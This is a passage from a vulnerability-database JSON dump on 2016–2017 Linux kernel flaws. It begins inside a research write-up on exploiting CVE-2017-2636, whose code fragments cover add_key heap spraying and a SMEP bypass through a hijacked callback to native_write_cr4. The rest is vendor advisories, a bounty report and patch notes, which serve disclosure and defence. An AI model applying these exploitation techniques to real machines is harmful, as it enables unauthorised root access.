shellcode resides in the userspace too, so executing it in the kernelspace will be detected by SMEP. We are going to bypass it soon.\r\n\r\n#### Heap spraying and stabilization\r\n\r\nAs I mentioned, `n_hdlc_release()` frees thirteen `n_hdlc_buf` items. Our `exploit_skb()` is executed shortly after that. Here we do the actual heap spraying by sending twenty 7500-byte UDP packets. Experiments showed that the packets number 12, 13, 14, and 15 are likely to be exploitable, so they are sent to the dedicated server socket.\r\n\r\nNow we are going to perform the use-after-free on `sk_buff.data`:\r\n\r\n* receive 4 network packets on the dedicated server socket one by one,\r\n* execute several `add_key` syscalls with our payload after receiving each of them.\r\n\r\nThe exact number of `add_key` syscalls giving the best results was found empirically by testing the exploit many times. The example of `add_key` call:\r\n\r\n\r\n\r\n```\r\nk[0] = syscall(__NR_add_key, \"user\", \"payload0\",\r\n\t\t\tpayload, PAYLOAD_SZ, KEY_SPEC_PROCESS_KEYRING);\r\n```\r\n\r\n\r\nIf we won the race and did the heap spraying luckily, then our shellcode is executed when the poisoned packet is received. After that we can invalidate the keys that were successfully allocated in the kernel memory:\r\n\r\n```\r\nfor (i = 0; i < KEYS_N; i++) {\r\n\tif (k[i] > 0)\r\n\t\tsyscall(__NR_keyctl, KEYCTL_INVALIDATE, k[i]);\r\n}\r\n```\r\n\r\nNow we need to prepare the heap to the next round of `n_hdlc` racing. The `/proc/slabinfo` shows that `kmalloc-8192` slab stores only 4 objects, so double-free error has high chances to crash the allocator. But the following trick helps to avoid that and makes the exploit much more stable \u2013 send a dozen UDP packets to fill the partially emptied slabs.\r\n\r\n### SMEP bypass\r\n\r\nAs I mentioned, the `root_it()` shellcode resides in the userspace. Executing it in the kernelspace is detected by [SMEP](http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux/) (Supervisor Mode Execution Protection). It is an x86 feature, which is enabled by toggling the bit 20 of CR4 register.\r\n\r\nThere are several approaches to defeat it, for example, Vitaly Nikolenko [describes](https://www.syscan360.org/slides/2016_SG_Vitaly_Nikolenko_Practical_SMEP_Bypass_Techniques.pdf) how to switch off SMEP using stack pivoting ROP technique. It works great, but I didn't want to copy it blindly. So I've created another quite funny way to defeat SMEP without ROP. Please inform me if that approach is already known.\r\n\r\nIn [`arch/x86/include/asm/special_insns.h`](http://lxr.free-electrons.com/source/arch/x86/include/asm/special_insns.h) I've found this function:\r\n\r\n\r\n\r\n```\r\nstatic inline void native_write_cr4(unsigned long val)\r\n{\r\n\tprintk(\"wcr4: 0x%lx\\n\", val);\r\n\tasm volatile(\"mov %0,%%cr4\": : \"r\" (val), \"m\" (__force_order));\r\n}\r\n```\r\n\r\n\r\n\r\nIt writes its first argument to CR4.\r\n\r\nNow let's look at `skb_release_data()`, which executes the hijacked `callback` in the Ring 0:\r\n\r\n\r\n```\r\n\tif (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {\r\n\t\tstruct ubuf_info *uarg;\r\n\r\n\t\tuarg = shinfo->destructor_arg;\r\n\t\tif (uarg->callback)\r\n\t\t\tuarg->callback(uarg, true);\r\n\t}\r\n```\r\n\r\n\r\nWe see that the destructor `callback` takes `uarg` address as the first argument. And we control this address in the exploited `sk_buff`.\r\n\r\nSo I've decided to write the address of `native_write_cr4()` to `ubuf_info.callback` and put `ubuf_info` item at the mmap'ed userspace address `0x406e0`, which is the correct value of CR4 with disabled SMEP.\r\n\r\nIn that case SMEP is disabled on one CPU core without any ROP. However, now we need to win the race twice: first time to disable SMEP, second time to execute the shellcode. But it's not a problem for this particular exploit since it is fast and reliable.\r\n\r\nSo let's initialize the payload a bit differently:\r\n\r\n```\r\n\t#define CR4_VAL\t0x406e0lu\r\n\r\n\tvoid *target_addr = (void *)(CR4_VAL & 0xfffff000lu);\r\n\r\n\tarea = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,\r\n\t\t\tMAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n\tif (area != target_addr) {\r\n\t\tperror(\"[-] mmap\\n\");\r\n\t\treturn EXIT_FAILURE;\r\n\t}\r\n\r\n\tuinfo_p = (struct ubuf_info *)CR4_VAL;\r\n\tuinfo_p->callback = NATIVE_WRITE_CR4;\r\n\r\n\tinfo->destructor_arg = (uint64_t)uinfo_p;\r\n\tinfo->tx_flags = SKBTX_DEV_ZEROCOPY;\r\n```\r\n\r\n\r\nThat SMEP bypass looks witty, but introduces one additional requirement - it needs bit 18 (OSXSAVE) of CR4 set to 1\\. Otherwise `target_addr` becomes 0 and `mmap()` fails, since mapping the zero page is not allowed.\r\n\r\n## Conclusion\r\n\r\nInvestigating of `CVE-2017-2636` and writing this article was a big fun for me. I want to thank [Positive Technologies](https://www.ptsecurity.com/ww-en/) for giving me the opportunity to work on this research. I would really appreciate feedback. See my contacts below.", "published": "2017-03-09T00:00:00", "type": "seebug", "title": "Linux kernel local privilege escalation flaw in n_hdlc\uff08CVE-2017-2636\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2384", "CVE-2017-2636"], "modified": "2017-03-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92755", "id": "SSV:92755", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "hackerone": [{"lastseen": "2019-08-27T22:22:17", "bulletinFamily": "bugbounty", "bounty": 1000.0, "cvelist": ["CVE-2017-6074"], "description": "Hi!\n\nCVE-2017-6074 [1] is a double-free vulnerability I found in the Linux kernel. It can be exploited to gain\nkernel code execution from an unprivileged processes. The kernel needs to be built with CONFIG_IP_DCCP for the vulnerability to be present. A lot of modern distributions enable this option by default.\n\nFixed on Feb 17, 2017 [2]. The oldest version that I checked is 2.6.18 (Sep 2006), which is vulnerable. However, the bug was introduced before that, probably in the first release with DCCP support (2.6.14, Oct 2005).\n\nI initially reported this vulnerability to security@kernel.org following the coordinated disclosure process. The timeline and more details about the vulnerability can be found in my announcement on oss-security [3]. A proof-of-concept exploit for the 4.4.0-62-generic #83-Ubuntu kernel can be found here [4, 5].\n\nThe reason I'm reporting this now is that I just saw a similar bug [6] in the Windows kernel reported to this program and that reminded me of a Sandbox Escape program that used to be on HackerOne. I thought it makes sense to see if IBB would come back to considering this kind of bugs eligible for a bounty.\n\nThanks!\n\n[1] https://nvd.nist.gov/vuln/detail/CVE-2017-6074\n\n[2] https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5edabca9d4cff7f1f2b68f0bac55ef99d9798ba4\n\n[3] http://seclists.org/oss-sec/2017/q1/471\n\n[4] https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074\n\n[5] http://seclists.org/oss-sec/2017/q1/503\n\n[6] https://hackerone.com/reports/48100\n\n## Impact\n\nThis vulnerability allows a local attacker to elevate privileges to root on a machine with vulnerable Linux kernel version.", "modified": "2019-08-27T21:07:09", "published": "2018-05-03T22:10:54", "id": "H1:347282", "href": "https://hackerone.com/reports/347282", "type": "hackerone", "title": "The Internet: Linux kernel: CVE-2017-6074: DCCP double-free vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:27:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5970"], "description": "The cumulative Virtuozzo ReadyKernel patch updated with security fixes. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), and 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3).\n**Vulnerability id:** CVE-2017-5970\nA vulnerability was found in the Linux kernel where having malicious IP options present would cause the ipv4_pktinfo_prepare() function to drop/free the dst. This could result in a system crash or possible privilege escalation.\n\n**Vulnerability id:** PSBM-64734\nA vulnerability was found in the implementation of SCTP protocol in the Linux kernel. If the sctp module was loaded on the host, a privileged user inside a container could cause a kernel crash by triggering use-after-free in the __sctp_connect() function with a specially crafted sequence of system calls.\n\n", "edition": 1, "modified": "2017-04-28T00:00:00", "published": "2017-04-28T00:00:00", "id": "VZA-2017-032", "href": "https://help.virtuozzo.com/customer/portal/articles/2796925", "title": "Kernel security update: CVE-2017-5970 and other; Virtuozzo ReadyKernel patch 20.0 for Virtuozzo 7.0.x", "type": "virtuozzo", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-05T11:27:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8399", "CVE-2017-12190"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3).\n**Vulnerability id:** CVE-2016-8399\nA flaw was found in the Linux networking subsystem where a local attacker with CAP_NET_ADMIN capabilities could cause an out-of-bounds memory access by creating a smaller-than-expected ICMP header and sending to its destination via sendto().\n\n**Vulnerability id:** CVE-2017-12190\nIt was found that in the Linux kernel through v4.14-rc5, bio_map_user_iov() and bio_unmap_user() in 'block/bio.c' do unbalanced pages refcounting if IO vector has small consecutive buffers belonging to the same page. bio_add_pc_page() merges them into one, but the page reference is never dropped, causing a memory leak and possible system lockup due to out-of-memory condition.\n\n", "edition": 1, "modified": "2017-10-23T00:00:00", "published": "2017-10-23T00:00:00", "id": "VZA-2017-097", "href": "https://help.virtuozzo.com/customer/portal/articles/2892757", "title": "Kernel security update: CVE-2016-8399 and other; Virtuozzo ReadyKernel patch 35.2 for Virtuozzo 7.0.0, 7.0.1, and 7.0.3", "type": "virtuozzo", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10088", "CVE-2016-9576", "CVE-2016-9588", "CVE-2017-5986", "CVE-2017-6074"], "description": "Arch Linux Security Advisory ASA-201702-17\n==========================================\n\nSeverity: High\nDate : 2017-02-22\nCVE-ID : CVE-2016-10088 CVE-2016-9588 CVE-2017-5986 CVE-2017-6074\nPackage : linux\nType : multiple issues\nRemote : No\nLink : https://security.archlinux.org/AVG-178\n\nSummary\n=======\n\nThe package linux before version 4.9.11-1 is vulnerable to multiple\nissues including privilege escalation and denial of service.\n\nResolution\n==========\n\nUpgrade to 4.9.11-1.\n\n# pacman -Syu \"linux>=4.9.11-1\"\n\nThe problems have been fixed upstream in version 4.9.11.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-10088 (privilege escalation)\n\nThe sg implementation in the Linux kernel through 4.9 does not properly\nrestrict write operations in situations where the KERNEL_DS option is\nset, which allows local users to read or write to arbitrary kernel\nmemory locations or cause a denial of service (use-after-free) by\nleveraging access to a /dev/sg device, related to block/bsg.c and\ndrivers/scsi/sg.c. NOTE: this vulnerability exists because of an\nincomplete fix for CVE-2016-9576.\n\n- CVE-2016-9588 (denial of service)\n\nLinux kernel built with the KVM visualization support (CONFIG_KVM),\nwith nested visualization(nVMX) feature enabled(nested=1), is\nvulnerable to an uncaught exception issue. It could occur if an L2\nguest was to throw an exception which is not handled by an L1 guest.\n\n- CVE-2017-5986 (denial of service)\n\nIt was reported that with Linux kernel, earlier than version v4.10-rc8,\nan application may trigger a BUG_ON in sctp_wait_for_sndbuf if the\nsocket tx buffer is full, a thread is waiting on it to queue more data,\nand meanwhile another thread peels off the association being used by\nthe first thread. This issue may then lead to a segmentation fault\nresulting in denial of service.\n\n- CVE-2017-6074 (privilege escalation)\n\nA use-after-free vulnerability has been discovered in the DCCP\nimplementation in the Linux kernel. The dccp_rcv_state_process function\nin net/dccp/input.c in the Linux kernel through 4.9.11 mishandles\nDCCP_PKT_REQUEST packet data structures in the LISTEN state. A local\nunprivileged user could use this flaw to alter the kernel memory,\nallowing them to escalate their privileges on the system via an\napplication that makes an IPV6_RECVPKTINFO setsockopt system call.\n\nImpact\n======\n\nA local unprivileged attacker is able to perform a denial of service\nattack or escalate their privileges on the system.\n\nReferences\n==========\n\nhttps://github.com/torvalds/linux/commit/2dcab598484185dea7ec22219c76dcdd59e3cb90\nhttp://seclists.org/oss-sec/2017/q1/432\nhttps://github.com/torvalds/linux/commit/5edabca9d4cff7f1f2b68f0bac55ef99d9798ba4\nhttps://patchwork.ozlabs.org/patch/728808/\nhttps://security.archlinux.org/CVE-2016-10088\nhttps://security.archlinux.org/CVE-2016-9588\nhttps://security.archlinux.org/CVE-2017-5986\nhttps://security.archlinux.org/CVE-2017-6074", "modified": "2017-02-22T00:00:00", "published": "2017-02-22T00:00:00", "id": "ASA-201702-17", "href": "https://security.archlinux.org/ASA-201702-17", "type": "archlinux", "title": "[ASA-201702-17] linux: multiple issues", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-22T18:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10088", "CVE-2016-9576", "CVE-2016-9588", "CVE-2017-5986", "CVE-2017-6074"], "description": "Arch Linux Security Advisory ASA-201702-18\n==========================================\n\nSeverity: High\nDate : 2017-02-22\nCVE-ID : CVE-2016-10088 CVE-2016-9588 CVE-2017-5986 CVE-2017-6074\nPackage : linux-zen\nType : multiple issues\nRemote : No\nLink : https://security.archlinux.org/AVG-186\n\nSummary\n=======\n\nThe package linux-zen before version 4.9.11-2 is vulnerable to multiple\nissues including privilege escalation and denial of service.\n\nResolution\n==========\n\nUpgrade to 4.9.11-2.\n\n# pacman -Syu \"linux-zen>=4.9.11-2\"\n\nThe problems have been fixed upstream in version 4.9.11.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-10088 (privilege escalation)\n\nThe sg implementation in the Linux kernel through 4.9 does not properly\nrestrict write operations in situations where the KERNEL_DS option is\nset, which allows local users to read or write to arbitrary kernel\nmemory locations or cause a denial of service (use-after-free) by\nleveraging access to a /dev/sg device, related to block/bsg.c and\ndrivers/scsi/sg.c. NOTE: this vulnerability exists because of an\nincomplete fix for CVE-2016-9576.\n\n- CVE-2016-9588 (denial of service)\n\nLinux kernel built with the KVM visualization support (CONFIG_KVM),\nwith nested visualization(nVMX) feature enabled(nested=1), is\nvulnerable to an uncaught exception issue. It could occur if an L2\nguest was to throw an exception which is not handled by an L1 guest.\n\n- CVE-2017-5986 (denial of service)\n\nIt was reported that with Linux kernel, earlier than version v4.10-rc8,\nan application may trigger a BUG_ON in sctp_wait_for_sndbuf if the\nsocket tx buffer is full, a thread is waiting on it to queue more data,\nand meanwhile another thread peels off the association being used by\nthe first thread. This issue may then lead to a segmentation fault\nresulting in denial of service.\n\n- CVE-2017-6074 (privilege escalation)\n\nA use-after-free vulnerability has been discovered in the DCCP\nimplementation in the Linux kernel. The dccp_rcv_state_process function\nin net/dccp/input.c in the Linux kernel through 4.9.11 mishandles\nDCCP_PKT_REQUEST packet data structures in the LISTEN state. A local\nunprivileged user could use this flaw to alter the kernel memory,\nallowing them to escalate their privileges on the system via an\napplication that makes an IPV6_RECVPKTINFO setsockopt system call.\n\nImpact\n======\n\nA local unprivileged attacker is able to perform a denial of service\nattack or escalate their privileges on the system.\n\nReferences\n==========\n\nhttps://github.com/torvalds/linux/commit/2dcab598484185dea7ec22219c76dcdd59e3cb90\nhttp://seclists.org/oss-sec/2017/q1/432\nhttps://github.com/torvalds/linux/commit/5edabca9d4cff7f1f2b68f0bac55ef99d9798ba4\nhttps://patchwork.ozlabs.org/patch/728808/\nhttps://security.archlinux.org/CVE-2016-10088\nhttps://security.archlinux.org/CVE-2016-9588\nhttps://security.archlinux.org/CVE-2017-5986\nhttps://security.archlinux.org/CVE-2017-6074", "modified": "2017-02-22T00:00:00", "published": "2017-02-22T00:00:00", "id": "ASA-201702-18", "href": "https://security.archlinux.org/ASA-201702-18", "type": "archlinux", "title": "[ASA-201702-18] linux-zen: multiple issues", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:00", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2618", "CVE-2017-2636", "CVE-2017-6074"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\n* A use-after-free flaw was found in the way the Linux kernel's Datagram Congestion Control Protocol (DCCP) implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket. A local, unprivileged user could use this flaw to alter the kernel memory, allowing them to escalate their privileges on the system. (CVE-2017-6074, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with non-namespace CAP_NET_ADMIN are able to trigger this call and create a situation in which the sockets sendbuff data size could be negative. This could adversely affect memory allocations and create situations where the system could crash or cause memory corruption. (CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux attributes on /proc/pid/attr files. An empty (null) write to this file can crash the system by causing the system to attempt to access unmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting CVE-2017-2636; Andrey Konovalov (Google) for reporting CVE-2017-6074; and Ralf Spenneberg for reporting CVE-2016-8650. The CVE-2017-2618 issue was discovered by Paul Moore (Red Hat Engineering).\n\nBug Fix(es):\n\n* The kernel-rt packages have been upgraded to version 3.10.0-514.rt56.219, which provides a number of bug fix updates over the previous version. (BZ#1429613)", "modified": "2018-06-07T18:14:51", "published": "2017-04-12T14:32:45", "id": "RHSA-2017:0932", "href": "https://access.redhat.com/errata/RHSA-2017:0932", "type": "redhat", "title": "(RHSA-2017:0932) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-02-24T09:00:29", "bulletinFamily": "info", "cvelist": ["CVE-2017-6074"], "edition": 1, "description": "Vulnerability description\nVulnerability ID: CVE-2017-6074 \nVulnerability discovered by: Andrey Konovalov \nVulnerability hazards: by an unprivileged process to obtain the kernel code execution and thus enhance permissions\nScope of impact: Linux kernel version>2.6.18(2006 9 months). But DCCP(datagram congestion Control Protocol)was first in the 05 year 10 on Linux kernel version 2. 6. 14 in support. Currently the vulnerability and 2017 years 2 months 17 repair. For details, please see the\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5edabca9d4cff7f1f2b68f0bac55ef99d9798ba4 \nVulnerability details\nDatagram congestion Control Protocol DCCP is a transport layer UDP new transport Protocol developed for transmitting real-time business. He is one can carry out congestion control for non-reliable transmission Protocol, and at the same time provide a variety of congestion control mechanisms at the start of communication by the user to negotiate options. \nMore detail description: \nhttps://www.kernel.org/doc/Documentation/networking/dccp.txt \nhttp://www.read.cs.ucla.edu/dccp/ \nThis vulnerability requires that a kernel compile time on CONFIG_IP_DCCP, many linux distributions by default. \nIn the current DCCP implementations, if the dccp_rcv_state_process in dccp_v6_conn_request returns\u201csuccess\u201d ,dccp_type for DCCP_PKT_REQUEST packet to the skb will be__kfree_skb mandatory release. \nHowever, if in the socket on the set IPV6_RECVPKTINFO, the skb address will be saved in ireq-> pktopts, and then dccp_v6_conn_request will increase skb reference count, so the skb is still in use. However, it will still be in dccp_rcv_state_process is released. \nThe repair way is to call consume_skb, it takes the skb->users, and not jump to discard and then calls__kfree_skb\u3002 \ndiff --git a/net/dccp/input. c b/net/dccp/input. c \nindex ba34718..8fedc2d 100644 \n\\--- a/net/dccp/input. c \n+++ b/net/dccp/input. c \nint dccp_rcv_state_process(struct sock *sk, struct sk_buff *skb, \nstruct dccp_hdr *dh, unsigned int len) \n{ \nstruct dccp_sock *dp = dccp_sk(sk); \nstruct dccp_skb_cb *dcb = DCCP_SKB_CB(skb); \nconst int old_state = sk->sk_state; \nint queued = 0; \n\nif (sk->sk_state == DCCP_LISTEN) { \nif (dh->dccph_type == DCCP_PKT_REQUEST) { \nif (inet_csk(sk)->icsk_af_ops->conn_request(sk, \nskb) \nreturn 1; \n\\- goto discard; \n\\+ consume_skb(skb); \n\\+ return 0; \n} \nif (dh->dccph_type == DCCP_PKT_RESET) \ngoto discard; \n/* Caller (dccp_v4_do_rcv) will send Reset */ \ndcb->dccpd_reset_code = DCCP_RESET_CODE_NO_CONNECTION; \nreturn 1; \n} else if (sk->sk_state == DCCP_CLOSED) { \ndcb->dccpd_reset_code = DCCP_RESET_CODE_NO_CONNECTION; \nreturn 1; \n} \nTo take advantage of this double-free, you can put it into a use-after-free: \n//First release\nkfree(dccp_skb) \n//In the dccp_skb the same position is assigned to another object: \nsome_object = kmalloc() \n//The second release, the actual release is some_object object \nkfree(dccp_skb) \nIn this case some_object holding a dangling pointer, so it is constructed out of a UAF. The attacker can control the object, at the same time by using the kernel heap spray technique writes any data to be overwritten object. \nIf the cover object is there any can trigger the function pointer, the attacker can be in the kernel to execute arbitrary code. \nLinux is the release version for the vulnerability related information\ndebian: the https://security-tracker.debian.org/tracker/CVE-2017-6074 \nredhat: the https://rhn.redhat.com/errata/RHSA-2017-0295.html \nubuntu: the http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-6074.html \nsuse: the https://www.suse.com/security/cve/CVE-2017-6074/ \nPoC \n\nthe PoC will publish in a few days,please update your linux kernel \nRepair recommendations\nRecommends that users update to the latest release to fix this vulnerability\nReference \nhttp://www.openwall.com/lists/oss-security/2017/02/22/3 \nhttps://zh.wikipedia.org/wiki/%E6%95%B0%E6%8D%AE%E6%8B%A5%E5%A1%9E%E6%8E%A7%E5%88%B6%E5%8D%8F%E8%AE%AE \nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6074 \nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5edabca9d4cff7f1f2b68f0bac55ef99d9798ba4 \nhttps://www.kernel.org/doc/Documentation/networking/dccp.txt \nhttp://www.read.cs.ucla.edu/dccp/ \n\n", "modified": "2017-02-23T00:00:00", "published": "2017-02-23T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/83679.htm", "id": "MYHACK58:62201783679", "type": "myhack58", "title": "Snow hidden for 11 years: Linux kernel DCCP double-free privilege escalation Vulnerability, CVE-2017-6074-a vulnerability warning-the black bar safety net", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:59", "bulletinFamily": "software", "cvelist": ["CVE-2016-9191", "CVE-2017-2584", "CVE-2017-6074", "CVE-2016-10088", "CVE-2017-2583", "CVE-2016-9588", "CVE-2017-5549"], "description": "# \n\n# **Severity**\n\nHigh\n\n# **Vendor**\n\nCanonical Ubuntu\n\n# **Versions Affected**\n\n * Canonical Ubuntu 14.04 LTS\n\n# **Description**\n\nIt was discovered that the generic SCSI block layer in the Linux kernel did not properly restrict write operations in certain situations. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. ([CVE-2016-10088](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10088>)) \n \nCAI Qian discovered that the sysctl implementation in the Linux kernel did not properly perform reference counting in some situations. An unprivileged attacker could use this to cause a denial of service (system hang). ([CVE-2016-9191](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9191>)) \n \nJim Mattson discovered that the KVM implementation in the Linux kernel mismanages the #BP and #OF exceptions. A local attacker in a guest virtual machine could use this to cause a denial of service (guest OS crash). ([CVE-2016-9588](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9588>)) \n \nAndy Lutomirski and Willy Tarreau discovered that the KVM implementation in the Linux kernel did not properly emulate instructions on the SS segment register. A local attacker in a guest virtual machine could use this to cause a denial of service (guest OS crash) or possibly gain administrative privileges in the guest OS. ([CVE-2017-2583](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-2583>)) \n \nDmitry Vyukov discovered that the KVM implementation in the Linux kernel improperly emulated certain instructions. A local attacker could use this to obtain sensitive information (kernel memory). ([CVE-2017-2584](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-2584>)) \n \nIt was discovered that the KLSI KL5KUSB105 serial-to-USB device driver in the Linux kernel did not properly initialize memory related to logging. A local attacker could use this to expose sensitive information (kernel memory). ([CVE-2017-5549](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-5549>)) \n \nAndrey Konovalov discovered a use-after-free vulnerability in the DCCP implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. ([CVE-2017-6074](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6074>))\n\n# **Affected Cloud Foundry Products and Versions**\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including:\n * 3151.x versions prior to 3151.11\n * 3233.x versions prior to 3233.14\n * 3263.x versions prior to 3263.20\n * 3312.x versions prior to 3312.20\n * 3363.x versions prior to 3363.9\n\n# **Mitigation**\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry team recommends upgrading to the following BOSH stemcells:\n * Upgrade 3151.x versions to 3151.11\n * Upgrade 3233.x versions to 3233.14\n * Upgrade 3263.x versions to 3263.20\n * Upgrade 3312.x versions to 3312.20\n * Upgrade 3363.x versions to 3363.9\n\n# **References**\n\n * [https://www.ubuntu.com/usn/usn-3208-2/](<https://www.ubuntu.com/usn/usn-3208-2/>)\n * [CVE-2016-10088](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10088>)\n * [CVE-2016-9191](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9191>)\n * [CVE-2016-9588](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9588>)\n * [CVE-2017-2583](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-2583>)\n * [CVE-2017-2584](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-2584>)\n * [CVE-2017-5549](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-5549>)\n * [CVE-2017-6074](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6074>)\n", "edition": 5, "modified": "2017-03-01T00:00:00", "published": "2017-03-01T00:00:00", "id": "CFOUNDRY:59BA3F002F833C86F9D716E2A3575DCB", "href": "https://www.cloudfoundry.org/blog/usn-3208-2/", "title": "USN-3208-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:55", "bulletinFamily": "software", "cvelist": ["CVE-2016-7097", "CVE-2016-7425", "CVE-2016-8658", "CVE-2016-9644"], "description": "USN-3146-2: Linux kernel (Xenial HWE) vulnerabilities \n\n\n# \n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04 LTS\n\n# Description\n\nIt was discovered that the `__get_user_asm_ex` implementation in the Linux kernel for x86/x86_64 contained extended `asm` statements that were incompatible with the exception table. A local attacker could use this to gain administrative privileges. (CVE-2016-9644)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem implementation in the Linux kernel did not clear the `setgid` bit during a `setxattr` call. A local attacker could use this to possibly elevate group privileges. (CVE-2016-7097)\n\nMarco Grassi discovered that the driver for Areca RAID Controllers in the Linux kernel did not properly validate control messages. A local attacker could use this to cause a denial of service (system crash) or possibly gain privileges. (CVE-2016-7425)\n\nDaxing Guo discovered a stack-based buffer overflow in the Broadcom IEEE802.11n FullMAC driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly gain privileges. (CVE-2016-8658)\n\n# Affected Cloud Foundry Products and Versions\n\nSeverity is medium unless otherwise noted.\n\nCloud Foundry BOSH stemcells are vulnerable, including:\n\n * All versions prior to 3151.5\n * 3233.x versions prior to 3233.6\n * 3263.x versions prior to 3263.12\n * 3312.x versions prior to 3312.6\n\nAll other unmaintained versions are potentially vulnerable. \n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below: \nThe Cloud Foundry project recommends upgrading to the following BOSH stemcells:\n\n * Upgrade all older versions to 3151.5 or later\n * Upgrade 3233.x versions to 3233.6 or later\n * Upgrade 3263.x versions to 3263.12 or later\n * Upgrade 3312.x versions to 3312.6 or later\n * Upgrade all other unmaintained versions to the most recent version of a maintained version line.\n\n# Credit\n\nMarco Grassi, Andreas Gruenbacher, Daxing Guo, and Jan Kara\n\n# References\n\n * <https://www.ubuntu.com/usn/usn-3146-2/>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-7097.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-7425.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-8658.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-9644.html>\n * <http://bosh.io>\n", "edition": 5, "modified": 